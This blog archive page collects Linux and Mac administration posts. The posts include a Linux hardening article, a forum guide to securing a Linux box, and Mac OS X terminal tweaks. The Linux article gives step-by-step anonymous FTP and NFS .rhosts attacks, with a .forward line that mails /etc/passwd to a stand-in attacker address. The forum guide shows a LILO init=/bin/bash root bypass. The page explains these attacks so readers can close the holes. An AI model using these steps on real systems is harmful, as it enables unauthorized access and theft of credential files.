February 2009 Archives

More Secure

By writch on February 26, 2009 6:44 PM | No Comments | No TrackBacks
 

Securing Your Linux Box

By Peter Vertes

With Linux becoming widespread in the work environment, the security of the individual machines must be considered. Machines running Linux can be networked easily, creating the potential risk of unauthorized users gaining access. This is particularly true if your Linux installation is straight out of the box. I will give a brief introduction to securing your Linux box and making your network environment a safer place for both your data and the people who use use it.

``You are only as strong as the weakest link in your defense,'' says the Chinese proverb, and this is certainly true in the field of computer security. If you forget to patch that newly downloaded version of lpd all your walls can come crumbling down, even with the securest system in the world. Always be cautious when installing any new software. If you are using Linux only as a desktop machine at home and you connect to the Internet via a modem, you do not have to worry so much. On the other hand, if you are running a mission-critical server wired into the Net, I would strongly advise checking out the security history of any piece of software that you wish to install (remembering that famous version of Sendmail).

Several mailing lists and many web pages offer extensive help on Linux security. The information is out there, you just need to go and harvest it. If you don't have the time, patience or know-how, contact a security consultant to take a look at your system setup and discover any potential weak spots. Usually security consultant firms have their own Tiger Teams who for a fee will attempt to make the walls crumble around your computer(s). Their object is to get into your system under a certain period of time and some even refund your money if they are unsuccessful. Tiger Teams are a valuable asset to security-conscious companies. Since Tiger Teams cost quite a bit, I would suggest you break into your own machines. This exercise can save you money, and give you a better understanding of the structure and different abstract layers of Linux in the process.

The starting point of our Linux security tour is the password. Many people keep their entire life on a computer and the only thing preventing others from seeing it is the eight-character string called a password. Not something one would call completely reliable. Contrary to popular belief, an uncrackable password does not exist. Given time and resources all passwords can be guessed either by social engineering or by brute force.

Since password cracking can be a time- and resource-consuming art, make it hard for any cracker who has grabbed your password file. Running a password cracker on a weekly basis on your system is a good idea. This helps to find and replace passwords that are easily guessed or weak. Also, a password checking mechanism should be present to reject a weak password when first choosing a password or changing an old one. Character strings that are plain dictionary words, or are all in the same case, or do not contain numbers or special characters should not be accepted as a new password.

A safe password can be constructed by taking the first letter of your favorite phrase, quote or sentence and adding special characters. For example, suppose my favorite phrase is, ``the quick brown fox jumped over the lazy dog,'' by taking the first letter of every word, I'd end up with tqbfjotld. Next, I'd add special characters and perhaps squeeze in the year resulting in a password of 9tqbf!jotld8. This is a much secure than the name of your spouse or child.

Word lists containing hundreds (if not thousands) of words that could be fed to a password cracker are available on the Internet. Some contain only names, so cracking the password ``maggie'' is quite trivial while the likelihood of 9tqbf!jotld8 appearing in one of those lists is quite slim. However, even though if our proposed password is not likely to appear in a word list, more advanced cracker programs come with a feature called Incremental Cracking Mode which means that every possible permutation is tried. The user gives it the minimum and maximum number of letters in a password, upper case or lower case, inclusion of special characters and numbers, and the passwords cracker does the rest. Granted, it could take a lot of time and resources, but it is possible.

Next, be aware of the services running on your system. Most distributions of Linux have HTTP, FTP, SMB, Sendmail and various other services running as default. Not everyone needs a web server running so why not get rid of it--it takes up resources and can be a potential security risk. To terminate web services, type: 

kill -9
To find out the process ID(s) of a certain daemon or service, type: 
ps aux | grep
Also, comment these daemons out of your start-up scripts so that they will not restart after a reboot. Unused services can let others gain information about your system and they could also pose as a security risk.

Another thing to avoid is the use of .rhosts files, as they are a favorite of crackers. The .rhosts files contain names of systems on which you have an account. When you use TELNET to log in to a system, the system checks its .rhosts file and if your machine name is found, it gives you access without the need for a password.

For more information about the .rhosts file, look in your favorite Linux or System Administration manual. One of the most famous exploits involving the .rhosts file is the misconfiguration of the Network File System (NFS). First the hacker checks for any exported file systems on your machines (to check, type: showmount -e), and if any are world writable. Next he remotely mounts your file system and places an .rhosts file into a user's directory. Last, the hacker uses TELNET to log into your machine as the that user, and your system is now compromised. The moral of this story: leave the configuration of the nfsd to someone who is more experienced than you or read the documentation carefully.

Another similar hack involves the misconfiguration of a popular service commonly found on the Internet; anonymous FTP. The first, and obvious method, of gaining unauthorized access via anonymous FTP is by letting the public have access to your password file. Granted all passwords are stored in encrypted form, but remember we've already shown crackers can get by this. Another way to gain access to the local password file is by exploiting the writeability of the /ftp directory. Look at these simple steps:

  1. Create a fake .forward file that has the following command in it: 
	|/bin/mail evildude@evil.com < /etc/passwd
  1. Connect to the victim machine via FTP and log in as user FTP.
  2. Enter any password you wish.
  3. Upload the .forward file you have created in Step 1.
  4. Log out and send mail to ftp@victim.machine.com.
  5. Sit back as victim.machine.com e-mails you a copy of its local password file.
Clearly, an easy way to get a password file. The heart of this hack lies in a simple mistake made by the system administrator; so, never make the /ftp directory writable by user anonymous. Setting up an anonymous FTP server is an art of its own, but it will help to remember these simple rules:

  • Only the /incoming directory should be made writable and only by root and user FTP.
  • Anonymous FTP users should have only executable (and read) access to the /pub and the /incoming directory.
  • FTP users should NOT be able to write to /ftp. If you enable write access, the above mentioned hack can (and presumably will) be made. For more information on how to correctly set up an anonymous FTP service, check out the man page for ftpaccess or the CERT advisory titled 93:10 (found at http://www.cert.org/).
One last thing to remember is that the system logs are your friends. The logs are the only way to find out what is/has/will be happening on your system, so keep reading them. Also, make sure that they are not being tampered with by intruders or by fellow system administrators. As Linux finds its way into more and more corporate environments, it is a crucial step to keep users out of each other's files and patch all the holes that might be utilized by hackers. With the notion of interconnectivity, industrial espionage will also be on the rise. With simple preventative measures and user education, the workplace can be a safe place for your secrets.

Securing Linux Tutorial

By writch on February 26, 2009 6:40 PM | No Comments | No TrackBacks

How to secure your Linux Box : Part 1

Guides & Tutorials


Reply
Page 1 of 2 1 2 >
 
Thread Tools Search this Thread
  #1  
Old 19-08-2004
abhay's Avatar
Member
  
Join Date: Jan 2004
Location: /home/n00b
Posts: 146
How to secure your Linux Box : Part 1
How to secure your Linux Box : Part 1

Recently, I have been watching a lot of my friends who use various versions of Windows getting a lot of viruses, mostly because of their negligence/ignorance. This sudden spurt in spread of Viruses/Worms/Trojans etc. made me think about Linux security. It also made me realise how vast this topic of "Securing a Linux Box" can be.
I tried searching Google for an easy and concise How-To on securing my Linux install but was unable to find one. It made me write this series of 3 very basic guides to enable a user put his first steps on the way of having a secure system.
This first part of the series will cover the basic tweaks that will help you close any open doors to your PC and remove any weak links that might lead to an easy way through your system.
So then lets start...
__________________
Spread the message, not the virus
--------------------------------------------

If you use any distro of Linux then please get counted.
Currently Goa has maximum number of Linux users per million Population (40.21).
To know about your state's UPMP visit this page
Reply With Quote
  #2  
Old 19-08-2004
abhay's Avatar
Member
  
Join Date: Jan 2004
Location: /home/n00b
Posts: 146
1) Password: The first step in making a Linux box secure is for you to realise that good passwords are back bone of Linux security. An easily guessed word or date or a dictionary word for that matter are as bad a password as none at all. The amazing thing is that even weak passwords can be turned into strong ones pretty easily. If you love your name and you always remember a particular date (may be your gf's b'day? ) then combining both of them in a random order might be a very good idea. For example: 14ab07ha19y83 is a way better password then just 'abhay' or '14071983'. Even better would be if you could add a few special characters to it like this 14ab#$07ha&^19y83. Yes the password is extremely difficult to remember thus you must practice it before you apply it to something as important as your root account.
If you are not smart enough or you are too lazy to make good passwords for your self then give a visit to
AllSeek.NFO or
TechZoom
The former is a better link as it also gives you a way to say your password so that you can remember it easily.
NOTE: I strictly recommend you making your own passwords instead of using such tools.

2) Securing LILO: Before everyone pounces on me by saying that "Oh!!! Start using GRUB", I would like to say that I am a bit old fashioned. Yes, I like LILO and love to stay with it but not with a HUGE flaw in its security. Before I go on explaining you as to how you can remove this major loophole, I would like to explain what it is.
If you are using LILO then rather than just pressing "Enter" key on the LILO prompt, write this on lilo prompt.
Code:
linux single
or
Code:
linux 1
You can see that I am just adding single or 1 after the word linux (this is the label with which you identify your Linux snippet in lilo.conf) and telling LILO to boot into single user mode. This single user mode will log you or any other smart-a$$ friend of yours in to a root shell where you can do everything you desire.
Some distros have grown out of this vulnerability and now add sulogin to their start up scripts. This will ask you for a root password once the system boots before taking you to the root shell but then there is a work around to this security as well by doing the following at the lilo prompt.
Code:
linux init=/bin/bash
Do you see what I am doing here? Yes you guessed it, I am telling init to launch /bin/bash as root as soon as the system starts. I could have launched any thing I wanted but /bin/bash would be the most convenient thing to have. The only problem in this method is that all your disks are mounted in ro mode i.e. read-only mode.
To get around this, pass the following commands
Code:
# fsck /
# mount -orw,remount /
Now, we are logged in as root no questions asked!!!
To get around this potentially serious security loop hole, you need to set a password for lilo so that you need to give the lilo password if you pass any comments to lilo prompt.
The resulting lilo.conf snippet will look something like this
Quote:
image = /boot/vmlinuz-2.6.8.1
label = slackware
restricted
password=<YourLILOPassword>
root = /dev/hdb2
read-only
The part in BOLD is the thing of concern here. I am telling LILO to have a restricted access with a password. Now everytime I pass some comments to LILO it will ask me for password. If I change restricted to mandatory then you will need to give password everytime you want to boot.
Also, you should change your lilo.conf permissions to 600 by passing the following command
Code:
#chmod 600 /etc/lilo.conf

__________________
Spread the message, not the virus
--------------------------------------------

If you use any distro of Linux then please get counted.
Currently Goa has maximum number of Linux users per million Population (40.21).
To know about your state's UPMP visit this page
Last edited by abhay : 19-08-2004 at 01:49 AM.
Reply With Quote
  #3  
Old 19-08-2004
abhay's Avatar
Member
  
Join Date: Jan 2004
Location: /home/n00b
Posts: 146
3) Open Ports, Services and nmap: nmap is a very important tool in managing your own security. It is a port scanner that can also tell which all ports are open on your system i.e. doors to your lovely home.
Pass the following command in a console window
Code:
root@darkstar:/home/abhay# nmap -P0 -O localhost

Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-08-18 20:28 IST
Interesting ports on localhost (127.0.0.1):
(The 1656 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE
25/tcp   open  smtp
110/tcp  open  pop3
6000/tcp open  X11
Device type: general purpose
Running: Linux 2.4.X|2.5.X
OS details: Linux 2.5.25 - 2.5.70 or Gentoo 1.2 Linux 2.4.19 rc1-rc7)
Uptime 0.058 days (since Wed Aug 18 19:04:33 2004)

Nmap run completed -- 1 IP address (1 host up) scanned in 5.371 seconds
root@darkstar:/home/abhay#
As you can see that I have three ports open. Two are for smtp and pop3 servers I run, (25 and 110 respectively) and 6000 is of X Server. You will have different results depending on open ports and running services on your system.
If you suspect something fishy and don't want a particular port to be opened on your PC then it is time to take action.

I Part: This part will involve finding out whether a port has been opened by a cracker or by a valid service on your system. To check whether the port has been opened by an official service, pass the following command.
Code:
cat /etc/services | grep <port>
If no output comes out then it means that the port is not associated with any known service. Next issue this command
Code:
netstat -anp | grep <port>
This command will tell you which process has opened the port and whether it is connecting to an IP or not. Usually a cracker will not allow an opened port to be reported in netstat so if you get an output from the above command then most probably it is a service separately installed from all the known services of the system.

II Part: This part deals with all the unwanted ports that has been reported by nmap. Now here comes the difficult part for me. There are various distros in market today and they use two different ways to handle services i.e. inetd and xinetd. I have more experience with inetd as Slackware Linux uses inetd to handle services but I will still try to throw some light on xinetd. For this part I would recommend using your distro specific control centre for dealing with services.

inetd part: To establish whether inetd demon is running or not pass the following command in a console window
Code:
root@darkstar:/home/abhay# ps aux | grep inetd
root      2289  0.0  0.1  1380  524 ?        Ss   22:25   0:00 /usr/sbin/inetd
root      2898  0.0  0.1  1676  584 pts/2    R+   22:47   0:00 grep inetd
The command and output is written above and it shows that inetd demon is running. Next step is to know which all services are being run by inetd.
Code:
root@darkstar:/home/abhay# grep -v "^#" /etc/inetd.conf
pop3    stream  tcp     nowait  root    /usr/sbin/tcpd <system specific entry>
smtp    stream  tcp     nowait  root    /usr/sbin/tcpd <system spefici entry>
The command entered above shows that I have two services running for my pop3 and smtp servers (I have edited the part that shows which servers I am running).
Stopping services run by inetd is extremely easy. You need to edit the /etc/inetd.conf file and comment out the unwanted services by adding a hash (#) before each entry. For example: finger, ntalk and telnet etc.
Then restart the inetd demon or restart the PC. Run nmap and the whole process mentioned above to find more open ports and services related to them.

xinetd part: If you have xinetd managing your system services then you should pass the following commands to establish whether xinetd is running or not.
Code:
ps aux | grep xinetd
Now to check which all services xinetd is running on your PC, you need to pass the following command.
Code:
ls -l /etc/xinetd.d/*
This will give you a list of all the services installed and monitored by xinted on your PC. Each service has a different file. I am giving sample structure of a xinetd service file.
Code:
# default: off
# description: The talk server accepts talk requests for chatting with 
# users on other systems.
service talk
{
		disable  	= no
		socket_type	= dgram
		wait		= yes
		user		= nobody
		group		= tty
		server		= /usr/bin/in.talkd
}
Now, to switch the talk service off, change the disable value to yes instead of no. disable all the services you do not need and restart xinetd demon or restart the PC. Run nmap and the whole process mentioned above to find more open ports and services related to them.

Miscellaneous Part: Not all services are and should be managed by inetd or xinetd as the demon itself might have problems thus network services are slowly but surely moving out of the control of these two demons. If after following the above mentioned steps, you still find some opened ports then they must be because of the network services that are not being controlled by inetd or xinetd. To deal with them, you need to look into /etc/rc.d directory by passing following command.
Code:
# cd /etc/rc.d
# ls -l
There you will find various directories that might look like rc0.d, rc1.d and so on. The numbers in these directories represent the run-levels on which the scripts in these directories are executed. For example: If your system starts with X-windows then it is most probably starting at run-level 5 which will lead to the scripts in rc5.d directory being executed on start up (you can know more about runlevels by reading man inittab).
To disable services in these directories I highly recommend using GUI tools like Mandrake Control Center, linuxconf and YaST etc. but if you want to be playful then go ahead and delete the un-needed files in the runlevel directory. These are just softlinks to original files so you will not cause major damage to your system but you must know how to solve a boo-boo.
Go through the nmap procedure once again so that you are absolutely sure of which ports are open and whether you need them or not. Phew...a really long quest is over ;-)
__________________
Spread the message, not the virus
--------------------------------------------

If you use any distro of Linux then please get counted.
Currently Goa has maximum number of Linux users per million Population (40.21).
To know about your state's UPMP visit this page
Reply With Quote
  #4  
Old 19-08-2004
abhay's Avatar
Member
  
Join Date: Jan 2004
Location: /home/n00b
Posts: 146
4) host files: Now we come to a simple but effective protection setting. This setting is done using host files located in your /etc directory. These files are often over looked by avid tweakers as these files can be easily cheated but I like keeping them tuned. I will be giving output of my host files along with explaining what they do.
(i) /etc/hosts: This file contains a list of known hosts on network. I like to keep it clean with just localhost entries.
Code:
root@darkstar:/# cat /etc/hosts
127.0.0.1               localhost
127.0.0.1               darkstar.slacknet darkstar
(ii) /etc/host.conf: This file controls the resolver setup of a system i.e. this is the file that is looked at first whenever a connection attempt needs to be resolved.
Code:
root@darkstar:/# cat /etc/host.conf
order hosts, bind
multi on
nospoof on
Also look at man host.conf.

(iii) /etc/hosts.equiv: This file contains a list of all the hosts on network that should be given equivalent rights as that of the localhost.
Code:
root@darkstar:/# cat /etc/hosts.equiv
localhost
(iv) /etc/hosts.allow: This file contains a list of all the hosts that should be allowed to gain access to your system.
Code:
root@darkstar:/# cat /etc/hosts.allow
ALL: localhost
(v) /etc/hosts.deny: This file contains a list of all the hosts that are denied access to your system. I would recommend you to make your hosts.deny look like mine and if you need any system to get access then add that exception in hosts.allow file.
Code:
root@darkstar:/# cat /etc/hosts.deny
ALL: ALL
If used properly, host files can be very helpful in securing you.
All these files have self explanatory names but if you still need any help then you can ask about it.

5) Updates: Just like Windows, Linux softwares release updates/patches regularly. Linux softwares are not absolutely free from bugs or security loopholes so please do not fall for this myth. Make it a religious practice to update your distro using any package tool it comes with. These days an update tool is available for almost every distro. Either they are inbuilt or can be obtained as a third party application. Here are a few examples:-
Quote:
ArchLinux - Pacman
Debian - Apt + Synaptic
Fedora Core - Apt + Synaptic
SuSE - Apt, YaST Online Update (YOU)
Mandrake - urpmi
Gentoo - Portage
Slackware - SWARET / Slapt-Get
(If I have missed some distros offering good update tools then please PM me)
Any distro not offering easy and prompt updates is not worth using (IMHO). Make it a weekly or bi-weekly practice to check for updates and install them if necessary. (Refrain from updating gcc)
__________________
Spread the message, not the virus
--------------------------------------------

If you use any distro of Linux then please get counted.
Currently Goa has maximum number of Linux users per million Population (40.21).
To know about your state's UPMP visit this page
Last edited by abhay : 19-08-2004 at 01:57 AM.
Reply With Quote
  #5  
Old 19-08-2004
abhay's Avatar
Member
  
Join Date: Jan 2004
Location: /home/n00b
Posts: 146
6) Conclusion: After doing all the above mentioned things your system should be reasonably secure from cracking attacks but I would still like to point a few last minute things.
i) Lots of network related applications come with their own IP settings and they might allow you to give them a range of IP's that will be allowed to access the application. Use this feature to set per application IP settings.
ii) Always try and read README file and man pages. They are their for you reading and not for deleting purpose. They might give you very important stuff to secure yourself.
iii) Try to "compile and install" the programs rather than relying on pre-compiled binaries. Never and I mean NEVER use any precompiled applications until you trust the source.
iv) Never work as root until you MUST.

Please post whether this guide helped you or not and if you would like any additions in it. If you find any faults, spelling mistakes or grammatical errors then do PM me or send me a mail. My next guide in this series will require you to have a bit of prior knowledge about kernel compiling. If you don't know how to compile a kernel then I recommend you to read an extremely good guide written by kingkrool located here.

Disclaimer: This guide is written with no guarantee at all. All the tweaks have been tried and tested by me on my own Slackware 10 (Kernel 2.6.8.1) box. You MUST backup before trying any of the commands mentioned above. I must not be held responsible for any harm done by these tweaks to your system.

Copyleft: This guide is copylefted and comes with full open source feeling. If you want to copy the whole or any part of this guide then you are totally free to do so but I would love it if you gave me some credit and sent me a link if possible on abhay.kedia<at>gmail.com

Additional Reading:
Redhat Linux 9 Manual
Hacking Linux Exposed
man lilo.conf
man nmap
man inetd (or xinetd)
man hosts
man host.conf
__________________
Spread the message, not the virus
--------------------------------------------

If you use any distro of Linux then please get counted.
Currently Goa has maximum number of Linux users per million Population (40.21).
To know about your state's UPMP visit this page

Bash Environment Variables

By writch on February 23, 2009 5:39 PM | No Comments | No TrackBacks
  #2 (permalink)  
Old 02-Aug-2007, 06:38
ken_yap
Guest
 
Posts: n/a
Default
Environment variables can only be set in the current process and exported downwards to child processes, not upwards to parent processes. Your shell script is a subprocess of the interactive shell. When your shell script ends, so does the scope of the environment variables. If you want a short cut to set the variables, then it has to be run in the current shell. Which means you have to source the script rather than run it as a child. The syntax is:

. script

That's a dot in the first column. It means read this file and run it as if I had typed the lines to this interactive shell.

Top 15 Terminal Commands for Hidden Mac OS X Settings

By writch on February 22, 2009 8:07 PM | No Comments | No TrackBacks

March 20, 2007 - Filed in: Terminal Dock/Exposé/Dashboard iTunes + iPod Finder Safari

There is a huge amount of hidden settings for Mac OS X and its applications that aren't accessible from preferences dialog boxes or the System Preferences. Applications such as Tinkertool and Mac Pilot allow you to access some of these, but the real flexibility is from the Terminal. From here it is possible to edit any preferences file for any application on your Mac.

You'll find the Terminal in the Utilities folder within the Applications folder. To carry out any of the following commands you will need to copy/paste or type in the line of text then hit enter. For the most part, applications will need restarting before changes take place. For most applications you can just quit and open them again, and for the Finder you can use the Force Quit dialog, just log out and log in again or type "killall Finder" into the terminal after the command.

Feel free to add any of your favourites in the comments.

1. defaults write com.apple.Dock showhidden -bool YES
Makes hidden applications' dock icons translucent. NO to reverse.

Translucent dock icons hidden applications


2. defaults write com.apple.iTunes invertStoreLinks -bool YES
Normally the arrows next to artists and albums in your iTunes library search the iTunes store when you click them. This command changes them so that clicking will search your iTunes library instead. Put NO at the end to reverse.


3. defaults write com.apple.dashboard devmode YES
This allows you to drag widgets out of Dashboard onto the desktop. Requires the dock to be relaunched to take effect, so type "killall Dock" and press enter. Now, if you click and hold onto a widget in the dashboard and press F12 to return to the desktop, the widget won't disappear with the rest. Put NO at the end to reverse.

Dashboard Widget on Desktop


4. defaults write com.apple.mail PreferPlainText -bool TRUE
Forces all mail to be displayed as plain text. Replace TRUE with FALSE to reverse.

5. defaults write -g NSNavPanelExpandedStateForSaveMode -bool TRUE
Sets expanded save dialogs as default (showing column/list view of folders rather than a drop down menu). Replace TRUE with FALSE to reverse.

6. /System/Library/Frameworks/ScreenSaver.framework/Resources/ ScreenSaverEngine.app/Contents/MacOS/ScreenSaverEngine -background
Displays the currently chosen screen saver to be shown as the desktop background. Press Control-C or Command-. to stop. More details here.

7. defaults write /Library/Preferences/com.apple.loginwindow AdminHostInfo SystemVersion 
Displays useful system stats in the login window. More details here. Replace "SystemVersion" with one of the following for different stats:
SystemBuild 
SerialNumber 
IPAddress 
DSStatus 
Time
HostName

8. sudo defaults write /Library/Preferences/com.apple.loginwindow HiddenUsersList -array-add shortname1 shortname2 shortname3
To remove accounts from the login window type this command with the short name of each account you wish to remove. More details here.

9. com.apple.frameworks.diskimages skip-verify TRUE
Skip disk image verification. Potentially risky, use with disk images from trusted sources. Replace TRUE with FALSE to reverse.

10. defaults write "Apple Global Domain" AppleScrollBarVariant DoubleBothPuts double scroll arrows at both ends of scroll bar. Use Appearance pane in system preferences to reset.

Horizontal Scroll-bar


11. defaults write com.apple.CrashReporter DialogType none
Disables the unexpectedly quit dialog that normally appears when an application crashes. Replace "none" with "prompt" to enable again.


12. defaults write com.apple.Safari WebKitHistoryItemLimit 2000 and/or
defaults write com.apple.Safari WebKitHistoryAgeInDaysLimit 30
Sets the history limit in Safari to a certain number of items and and/or a certain age.

13. defaults write com.apple.finder AppleShowAllFiles TRUE
Shows hidden files in the finder. Replace TRUE with FALSE to hide hidden files again

14. defaults write com.apple.safari IncludeDebugMenu 1
Enables the debug menu in Safari. Type again but with 0 instead of 1 at the end to disable.

15. defaults write com.apple.dashboard mcx-disabled -boolean YES
Deactivates Dashboard. Requires the dock to be relaunched to take effect, so type "killall Dock" and press enter. Replace YES with NO to enable again.
« November 2008 | Main Index | Archives | April 2009 »

April 2009

Sun Mon Tue Wed Thu Fri Sat
      1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30    

Search

About this Archive

This page is an archive of entries from February 2009 listed from newest to oldest.

November 2008 is the previous archive.

April 2009 is the next archive.

Find recent content on the main index or look in the archives to find all content.

Categories

Monthly Archives

Pages

OpenID accepted here Learn more about OpenID
Powered by Movable Type 4.21-en